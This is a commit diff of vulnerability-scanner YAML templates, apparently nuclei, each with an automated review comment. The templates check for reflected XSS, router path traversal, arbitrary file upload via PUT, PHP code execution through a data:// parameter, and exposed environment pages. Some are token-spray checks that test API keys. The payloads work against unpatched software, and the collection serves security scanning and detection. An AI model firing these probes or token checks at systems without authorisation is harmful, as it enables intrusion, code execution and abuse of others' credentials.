Merge branch 'master' into dashboard
commit
e83f9df9f2
@ -0,0 +1,9 @@
cves/2013/CVE-2013-6281.yaml
cves/2018/CVE-2018-18608.yaml
cves/2019/CVE-2019-18371.yaml
cves/2021/CVE-2021-45428.yaml
cves/2022/CVE-2022-0346.yaml
exposures/files/xampp-environment-variables.yaml
token-spray/api-debounce.yaml
token-spray/api-tatum.yaml
vulnerabilities/dedecms/dedecms-config-xss.yaml
@ -0,0 +1,46 @@
id: CVE-2013-6281

info:
name: WordPress Spreadsheet - dhtmlxspreadsheet Plugin Reflected XSS
author: random-robbie
severity: medium
description: |
The dhtmlxspreadsheet WordPress plugin was affected by a /dhtmlxspreadsheet/codebase/spreadsheet.php page Parameter Reflected XSS security vulnerability.
reference:
- https://wpscan.com/vulnerability/49785932-f4e0-4aaa-a86c-4017890227bf
- https://www.securityfocus.com/bid/63256/
- https://wordpress.org/plugins/dhtmlxspreadsheet/
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6281
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2013-6281
cwe-id: CWE-79
metadata:
google-dork: inurl:/wp-content/plugins/dhtmlxspreadsheet
verified: "true"
tags: cve,cve2013,wordpress,xss,wp-plugin,wp

requests:
- raw:
- |
GET /wp-content/plugins/dhtmlxspreadsheet/codebase/spreadsheet.php?page=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1
Host: {{Hostname}}

matchers-condition: and
matchers:
- type: word
part: body
words:
- "page: '<script>alert(document.domain)</script>'"
- "dhx_rel_path"
condition: and

- type: word
part: header
words:
- text/html

- type: status
status:
- 200
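Review bot: `verified: "true"` under `metadata` is a quoted string, while the other new templates in this commit (CVE-2022-0346, CVE-2022-1597) write `verified: true` as a bare boolean; pick one form across the set so the field is parsed with one type. The description also reads awkwardly ("was affected by a ... page Parameter Reflected XSS security vulnerability"); say directly that the `page` parameter of `/dhtmlxspreadsheet/codebase/spreadsheet.php` is written unescaped into the response, which is exactly what the body word `page: '<script>alert(document.domain)</script>'` checks for, and the second word `dhx_rel_path` pins the match to the real plugin page rather than a generic reflection.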
@ -0,0 +1,44 @@
id: CVE-2018-18608

info:
name: DedeCMS V5.7 - Cross Site Scripting
author: ritikchaddha
severity: medium
description: |
DedeCMS 5.7 SP2 allows XSS via the function named GetPageList defined in the include/datalistcp.class.php file that is used to display the page numbers list at the bottom of some templates, as demonstrated by the PATH_INFO to /member/index.php, /member/pm.php, /member/content_list.php, or /plus/feedback.php.
reference:
- https://github.com/ky-j/dedecms/issues/8
- https://nvd.nist.gov/vuln/detail/CVE-2018-18608
- https://github.com/ky-j/dedecms/files/2504649/Reflected.XSS.Vulnerability.exists.in.the.file.of.DedeCMS.V5.7.SP2.docx
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2018-18608
cwe-id: CWE-79
metadata:
shodan-query: http.html:"DedeCms"
verified: "true"
tags: dedecms,xss,cve,cve2018

requests:
- method: GET
path:
- "{{BaseURL}}/plus/feedback.php/rp4hu%27><script>alert%28document.domain%29<%2fscript>?aid=3"

matchers-condition: and
matchers:
- type: word
part: body
words:
- "'><script>alert(document.domain)</script>"
- "DedeCMS Error Warning!"
condition: and

- type: word
part: header
words:
- text/html

- type: status
status:
- 200
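Review bot: the request path mixes encodings: the quote is sent as `%27` and the parentheses and closing slash as `%28`/`%29`/`%2f`, while `<` and `>` in the same payload are left literal; encode the whole injected PATH_INFO segment consistently so the bytes on the wire are deterministic and the body word `'><script>alert(document.domain)</script>` keeps matching the reflection. The description lists four reflecting endpoints (`/member/index.php`, `/member/pm.php`, `/member/content_list.php`, `/plus/feedback.php`) but only `/plus/feedback.php` is probed; either add the others as extra `path` entries or say in the description that only `/plus/feedback.php` is checked. Minor: the name says "V5.7" while the description says "5.7 SP2"; align them.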
@ -0,0 +1,33 @@
id: CVE-2019-18371

info:
name: Xiaomi routers - Local file inclusion
author: ritikchaddha
severity: high
description: |
An issue was discovered on Xiaomi Mi WiFi R3G devices before 2.28.23-stable. There is a directory traversal vulnerability to read arbitrary files via a misconfigured NGINX alias, as demonstrated by api-third-party/download/extdisks../etc/config/account. With this vulnerability, the attacker can bypass authentication.
reference:
- https://ultramangaia.github.io/blog/2019/Xiaomi-Series-Router-Command-Execution-Vulnerability.html
- https://nvd.nist.gov/vuln/detail/CVE-2019-18371
- https://github.com/UltramanGaia/Xiaomi_Mi_WiFi_R3G_Vulnerability_POC/blob/master/arbitrary_file_read_vulnerability.py
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2019-18371
cwe-id: CWE-22
tags: xiaomi,cve2019,cve,lfi,router,mi

requests:
- method: GET
path:
- "{{BaseURL}}/api-third-party/download/extdisks../etc/passwd"

matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"

- type: status
status:
- 200
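Review bot: the name "Local file inclusion" and the `lfi` tag do not match what the description and `cwe-id: CWE-22` describe, which is a directory traversal through a misconfigured NGINX alias that reads arbitrary files off the router; call it an arbitrary file read / directory traversal so the name and the classification agree. The probe reads `/etc/passwd` and matches `root:.*:0:0:`, which is a sensible non-sensitive canary; it would help to state in the description that the authentication-bypass impact comes from the `extdisks../etc/config/account` path it mentions, so a reader understands why a passwd read is rated high. The regex matcher carries no `part:`; the sibling templates in this commit spell out `part: body`, so do the same here for uniformity.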
@ -8,6 +8,7 @@ info:
reference:
- https://ssd-disclosure.com/ssd-advisory-yealink-dm-pre-auth-root-level-rce/
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-27561
- https://ssd-disclosure.com/?p=4688
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
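Review bot: the MITRE reference in this hunk is missing the `CVE-` prefix: `https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-27561` should be `...cvename.cgi?name=CVE-2021-27561`, as the other MITRE links in this commit are written. The new `https://ssd-disclosure.com/?p=4688` is a bare post-ID URL; if it resolves to the same advisory as the slug URL two lines above it, it is a duplicate and can be dropped.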
@ -5,12 +5,12 @@ info:
author: hackergautam
severity: critical
description: Apache Solr versions 8.8.1 and prior contain a server-side request forgery vulnerability. The ReplicationHandler (normally registered at "/replication" under a Solr core) in Apache Solr has a "masterUrl" (also "leaderUrl" alias) parameter that is used to designate another ReplicationHandler on another Solr core to replicate index data into the local core. To prevent a SSRF vulnerability, Solr ought to check these parameters against a similar configuration it uses for the "shards" parameter.
remediation: This issue is resolved in Apache Solr 8.8.2 and later.
reference:
- https://www.anquanke.com/post/id/238201
- https://ubuntu.com/security/CVE-2021-27905
- https://nvd.nist.gov/vuln/detail/CVE-2021-27905
- https://nsfocusglobal.com/apache-solr-arbitrary-file-read-and-ssrf-vulnerability-threat-alert/
remediation: This issue is resolved in Apache Solr 8.8.2 and later.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
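Review bot: `remediation: This issue is resolved in Apache Solr 8.8.2 and later.` appears twice in this hunk, once above `reference:` and once below it; the hunk is a same-size change (-5,12 +5,12), so this should be a move, but confirm that only one copy lands in the file, since two `remediation` keys under `info` is a duplicate-key YAML error. The description's last sentence ("Solr ought to check these parameters against a similar configuration it uses for the 'shards' parameter") is the fix rationale, not a description of the flaw; the point a user needs is that `masterUrl`/`leaderUrl` accept an arbitrary URL that the core then fetches, which is the SSRF.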
@ -9,6 +9,7 @@ info:
- https://github.com/sickcodes/security/blob/master/advisories/SICK-2021-011.md
- https://github.com/advisories/GHSA-pch5-whg9-qr2r
- https://nvd.nist.gov/vuln/detail/CVE-2021-28918
- https://github.com/rs/node-netmask
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
cvss-score: 9.1
@ -9,6 +9,7 @@ info:
reference:
- https://ssd-disclosure.com/ssd-advisory-voipmonitor-unauth-rce/
- https://nvd.nist.gov/vuln/detail/CVE-2021-30461
- https://ssd-disclosure.com/ssd-advisory--voipmonitor-unauth-rce
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
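Review bot: the new reference `https://ssd-disclosure.com/ssd-advisory--voipmonitor-unauth-rce` differs from the existing first reference only by a doubled hyphen and the missing trailing slash; it reads as a mistyped copy of the same URL rather than a second source, so drop it (or fix the slug) instead of carrying a near-duplicate.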
@ -9,6 +9,7 @@ info:
- https://www.ambionics.io/blog/laravel-debug-rce
- https://github.com/vulhub/vulhub/tree/master/laravel/CVE-2021-3129
- https://nvd.nist.gov/vuln/detail/CVE-2021-3129
- https://github.com/facade/ignition/pull/334
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
@ -11,12 +11,12 @@ info:
- https://attackerkb.com/topics/rJw4DFI2RQ/cve-2021-44515/rapid7-analysis
- https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp
- https://nvd.nist.gov/vuln/detail/CVE-2021-44515
remediation: For Enterprise builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For Enterprise builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3. For MSP builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For MSP builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-44515
cwe-id: CWE-287
remediation: For Enterprise builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For Enterprise builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3. For MSP builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For MSP builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3.
tags: cve,cve2021,cisa,zoho,rce,manageengine

requests:
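Review bot: same move check as the Solr hunk: `remediation:` is shown both above `classification:` and below `cwe-id:`, so make sure only one copy remains in the file. The two moves in this commit also put the key in different places (after `reference:` for CVE-2021-27905, after `classification:` here); settle on one position for `remediation` inside `info` so the templates stay uniform.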
@ -0,0 +1,48 @@
id: CVE-2021-45428

info:
name: Telesquare TLR-2005KSH 1.0.0 - Arbitrary File Upload
author: gy741
severity: critical
description: |
TLR-2005KSH is affected by an incorrect access control vulnerability. THe PUT method is enabled so an attacker can upload arbitrary files including HTML and CGI formats.
reference:
- https://drive.google.com/file/d/1wM1SPOfB9mH2SES7cAmlysuI9fOpFB3F/view?usp=sharing
- http://packetstormsecurity.com/files/167101/TLR-2005KSH-Arbitrary-File-Upload.html
- https://nvd.nist.gov/vuln/detail/CVE-2021-45428
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-45428
cwe-id: CWE-639
metadata:
shodan-query: http.html:"TLR-2005KSH"
verified: "true"
tags: cve,cve2021,telesquare,intrusive,fileupload

requests:
- raw:
- |
GET /{{randstr}}.txt HTTP/1.1
Host: {{Hostname}}

- |
PUT /{{randstr}}.txt HTTP/1.1
Host: {{Hostname}}

CVE-2021-45428

- |
GET /{{randstr}}.txt HTTP/1.1
Host: {{Hostname}}

req-condition: true
matchers-condition: and
matchers:
- type: dsl
dsl:
- 'status_code_1 == 404 && status_code_2 == 201'
- 'contains(body_3, "CVE-2021-45428") && status_code_3 == 200'
condition: and

# Enhanced by mp on 2022/05/19
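Review bot: `cwe-id: CWE-639` (Authorization Bypass Through User-Controlled Key) does not describe what the description says, which is an unrestricted HTTP `PUT` that writes arbitrary files; the classification should follow the description. Typo in the description: `THe`. The check leaves `/{{randstr}}.txt` on the device afterwards (the `intrusive` tag is correct); add a fourth raw request that `DELETE`s the file, or say in the description that an artefact is left behind. The DSL also relies on `{{randstr}}` expanding to the same value in all three raw requests, otherwise the 404 baseline, the 201 from the PUT and the final GET refer to three different files; confirm that before trusting `status_code_1 == 404`.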
@ -10,12 +10,14 @@ info:
- https://www.exploit-db.com/exploits/50936
- https://drive.google.com/drive/folders/1YJlVlb4SlTEGONzIjiMwd2P7ucP_Pm7T?
- https://nvd.nist.gov/vuln/detail/CVE-2021-46422
- https://drive.google.com/drive/folders/1YJlVlb4SlTEGONzIjiMwd2P7ucP_Pm7T?usp=sharing
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-46422
cwe-id: CWE-78
metadata:
shodan-query: html:"SDT-CW3B1"
verified: "false"
tags: cve,cve2021,injection,rce
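Review bot: the new `metadata` block sets `verified: "false"` as a quoted string; elsewhere in this commit the field is a bare boolean (`verified: true`), so write `verified: false` here so the field has one type across templates, and decide whether a template explicitly marked unverified should ship a `shodan-query` before it has been run against a live target. Replacing the dangling `...1YJlVlb4SlTEGONzIjiMwd2P7ucP_Pm7T?` link with the `?usp=sharing` form is fine. The tags carry no vendor or product tag, unlike the other templates here (`telesquare`, `zyxel`, `xiaomi`), so the template cannot be selected by vendor with `-tags`; add one.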
@ -0,0 +1,42 @@
id: CVE-2022-0346

info:
name: Google XML Sitemap Generator < 2.0.4 - Reflected Cross-Site Scripting & RCE
author: Akincibor
severity: high
description: |
The plugin does not validate a parameter which can be set to an arbitrary value, thus causing XSS via error message or RCE if allow_url_include is turned on.
reference:
- https://wpscan.com/vulnerability/4b339390-d71a-44e0-8682-51a12bd2bfe6
- https://wordpress.org/plugins/www-xml-sitemap-generator-org/
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0346
metadata:
verified: true
tags: xss,wp,wordpress,wp-plugin,cve,cve2022

requests:
- method: GET
path:
- '{{BaseURL}}/?p=1&xsg-provider=data://text/html,%3C?php%20phpinfo();%20//&xsg-format=yyy&xsg-type=zz&xsg-page=pp'
- '{{BaseURL}}/?p=1&xsg-provider=%3Cimg%20src%20onerror=alert(document.domain)%3E&xsg-format=yyy&xsg-type=zz&xsg-page=pp'

req-condition: true
matchers-condition: and
matchers:
- type: dsl
dsl:
- "contains(body_1, 'PHP Extension') || contains(body_1, 'PHP Version')"
- "contains(body_2, '<img src onerror=alert(document.domain)>') || contains(body_2, 'Invalid Renderer type specified')"
condition: or

- type: word
part: header
words:
- text/html

extractors:
- type: regex
part: body
group: 1
regex:
- '>PHP Version <\/td><td class="v">([0-9.]+)'
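Review bot: the MITRE reference points at the wrong year: `...cvename.cgi?name=CVE-2002-0346` should be `CVE-2022-0346`, matching `id:` and the wpscan entry. The template also has no `classification` block (cve-id, cwe-id, cvss) although every other CVE template in this commit carries one. The first request executes `phpinfo()` through a `data://` provider when `allow_url_include` is on, which is code execution on the target, yet the tags list only `xss`; add `rce` so the template's real behaviour is visible to users filtering by tag, and decide whether it also warrants `intrusive`. Note too that the second DSL clause accepts `Invalid Renderer type specified` alone, so a target that only prints the error page without reflecting the `<img>` payload still matches; if that is intended as a version fingerprint rather than proof of XSS, say so in the description.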
@ -1,4 +1,4 @@
id: CVE-2022-1598
id: CVE-2022-1597

info:
name: WPQA < 5.4 - Reflected Cross-Site Scripting
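Review bot: changing `id` from CVE-2022-1598 to CVE-2022-1597 agrees with the MITRE link and the `cve-id` fix in the next hunk, but this rendering does not show the file path; the repository convention is that the id and the filename match, so confirm the file now ships as `cves/2022/CVE-2022-1597.yaml` and that nothing else still carries the 1598 id.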
@ -12,7 +12,7 @@ info:
- https://wpscan.com/vulnerability/faff9484-9fc7-4300-bdad-9cd8a30a9a4e
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1597
classification:
cve-id: CVE-2022-1598
cve-id: CVE-2022-1597
metadata:
verified: true
google-dork: inurl:/wp-content/plugins/wpqa
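Review bot: with `cve-id` corrected to CVE-2022-1597, the `classification` block still contains only that one key; the other CVE templates in this commit carry `cvss-metrics`, `cvss-score` and `cwe-id` (CWE-79 for a reflected XSS), so fill those in while the file is being touched.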
@ -3,7 +3,7 @@ id: CVE-2022-30489
info:
name: Wavlink Wn535g3 - POST XSS
author: For3stCo1d
severity: high
severity: medium
description: |
WAVLINK WN535 G3 was discovered to contain a cross-site scripting (XSS) vulnerability via the hostname parameter at /cgi-bin/login.cgi.
reference:
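Review bot: lowering `severity` from high to medium for a reflected XSS in the `hostname` parameter of `/cgi-bin/login.cgi` brings this template in line with the other XSS templates in this commit (CVE-2013-6281 and CVE-2018-18608 are both medium with a 6.1 score); the hunk does not show the classification block, so check that any `cvss-score` in the file is adjusted to agree with the new severity.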
@ -9,13 +9,14 @@ info:
reference:
- https://www.rapid7.com/blog/post/2022/05/12/cve-2022-30525-fixed-zyxel-firewall-unauthenticated-remote-command-injection/
- https://github.com/rapid7/metasploit-framework/pull/16563
- https://nvd.nist.gov/vuln/detail/CVE-2022-30525
- https://www.zyxel.com/support/Zyxel-security-advisory-for-OS-command-injection-vulnerability-of-firewalls.shtml
- https://nvd.nist.gov/vuln/detail/CVE-2022-30525
metadata:
shodan-query: title:"USG FLEX 100","USG FLEX 100w","USG FLEX 200","USG FLEX 500","USG FLEX 700","USG FLEX 50","USG FLEX 50w","ATP100","ATP200","ATP500","ATP700"
classification:
cve-id: CVE-2022-30525
metadata:
shodan-query: title:"USG FLEX 100","USG FLEX 100w","USG FLEX 200","USG FLEX 500","USG FLEX 700","USG FLEX 50","USG FLEX 50w","ATP100","ATP200","ATP500","ATP700"
tags: rce,zyxel,cve,cve2022,firewall,unauth

requests:
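Review bot: the `metadata`/`shodan-query` pair and the NVD link each appear twice in this hunk (above and below `classification:`), which reads as a move; make sure the result has a single `metadata` block, since a duplicate key under `info` is invalid YAML. The query itself is one `title:` qualifier followed by eleven comma-separated quoted product names; verify that Shodan treats that as an alternation rather than one literal title string, and if it does not, split it into several queries or match on a substring shared by the USG FLEX and ATP models. The `classification` block here holds only `cve-id`; add the cvss and cwe fields as the other templates do.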
@ -0,0 +1,30 @@
id: xampp-environment-variables

info:
name: XAMPP Environment Variables Exposure
author: melbadry9,DhiyaneshDK
severity: low
tags: exposure,xampp

requests:
- method: GET
path:
- "{{BaseURL}}/cgi-bin/printenv.pl"

matchers-condition: and
matchers:
- type: word
part: body
words:
- "<TITLE>Environment Variables</TITLE>"
- "Environment Variables:"
condition: and

- type: word
part: header
words:
- "text/html"

- type: status
status:
- 200
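Review bot: the template has no `description` and no `reference`, so a user who gets a hit on `/cgi-bin/printenv.pl` has no context for what was exposed; add a description saying that the sample CGI prints the web server process environment (filesystem paths, server software and version, and possibly secrets passed to the process via environment variables) and link the XAMPP or Apache documentation for the sample script. The body matcher requires both `<TITLE>Environment Variables</TITLE>` and `Environment Variables:`, so a customised copy of the script would be missed; that is acceptable for a low-severity exposure check but worth a comment.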
@ -12,6 +12,7 @@ requests:
- method: GET
path:
- "{{BaseURL}}/haproxy-status"
- "{{BaseURL}}/haproxy?stats"

matchers-condition: and
matchers:
@ -0,0 +1,25 @@
id: api-debounce

info:
name: DeBounce API Test
author: 0ri2N
severity: info
reference:
- https://developers.debounce.io/reference/api-key-authentication
- https://debounce.io
tags: debounce,token-spray

self-contained: true
requests:
- method: GET
path:
- "https://api.debounce.io/v1/?api={{token}}&email=test@example.com"

matchers:
- type: word
part: body
words:
- '"balance":'
- '"success":'
- '"debounce":'
condition: and
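Review bot: the matcher only checks that the keys `"balance":`, `"success":` and `"debounce":` are present; if the API answers an invalid key with a JSON body that still carries those keys (for example with `"success":"0"`), the template reports the token as valid. Match on a value that only a valid key produces, or add a negative matcher for the error body. Also note that the probe performs a real validation of `test@example.com`, so a valid key may be charged for that lookup (the response includes a `balance` field), and the key travels in the query string where it is written to proxy and server access logs.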
@ -0,0 +1,28 @@
id: api-tatum

info:
name: Tatum API Test
author: 0ri2N
severity: info
reference:
- https://apidoc.tatum.io/#tag/Node-RPC
- https://docs.tatum.io
tags: defi,dapp,token-spray,blockchain

self-contained: true
requests:
- method: POST
path:
- "https://api-eu1.tatum.io/v3/blockchain/node/ETH/{{token}}"
headers:
Content-Type: application/json
body: "{\"jsonrpc\":\"2.0\",\"method\":\"web3_clientVersion\",\"params\":[ ],\"id\":1}"

matchers:
- type: word
part: body
words:
- '"id":'
- '"result":'
- '"jsonrpc":'
condition: and
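Review bot: the API key is embedded in the URL path (`/v3/blockchain/node/ETH/{{token}}`), so every probe writes the candidate token into proxy and server access logs; say so in `info` so users know this spray is not log-safe. Of the three body words, `"result":` is the one that actually discriminates a valid key, because a JSON-RPC error response still carries `"id":` and `"jsonrpc":` but has `"error"` in place of `"result"`; `web3_clientVersion` is a read-only call, which is the right choice for a token check.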
@ -0,0 +1,37 @@
id: dedecms-config-xss

info:
name: DedeCMS V5.7 config.php XSS
author: ritikchaddha
severity: medium
description: |
DeDeCMS v5.7 has an XSS vulnerability in the '/include/dialog/config.php' file, and attackers can use this vulnerability to steal user cookies, hang horses, etc.
reference:
- https://www.zilyun.com/8665.html
- https://www.60ru.com/161.html
- https://www.cnblogs.com/milantgh/p/3615853.html
metadata:
verified: true
shodan-query: http.html:"DedeCms"
tags: dedecms,xss

requests:
- method: GET
path:
- "{{BaseURL}}/include/dialog/config.php?adminDirHand=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"

matchers-condition: and
matchers:
- type: word
part: body
words:
- "location='../../</script><script>alert(document.domain)</script>"

- type: word
part: header
words:
- text/html

- type: status
status:
- 200
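Review bot: "hang horses" in the description is a literal rendering of the Chinese 挂马 (planting a trojan or drive-by download); write "steal cookies or plant malicious scripts" instead. The template has no `classification` (`cwe-id: CWE-79`) although its sibling CVE-2018-18608 in this commit, by the same author for the same product, carries one; add it. The `adminDirHand` payload first closes the existing script context (`</script><script>...`), which is why the body word is `location='../../</script><script>alert(document.domain)</script>`; one sentence on that in the description would explain to readers why a bare `<script>` payload is not used.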